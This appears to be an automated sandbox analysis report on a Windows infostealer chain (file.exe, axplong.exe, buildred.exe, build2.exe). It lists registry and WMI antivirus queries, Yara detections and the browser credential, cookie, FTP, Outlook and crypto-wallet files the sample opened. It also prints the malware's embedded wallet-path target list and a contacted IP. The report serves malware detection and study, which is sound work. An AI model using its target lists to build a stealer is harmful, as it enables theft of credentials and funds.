Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 9.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED
Source: Yara match File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fpFm_@.
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED
Source: Yara match File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob, 0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name, 0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings, 0_2_6C7E8EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C8C0B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7E6410 bind,WSAGetLastError, 0_2_6C7E6410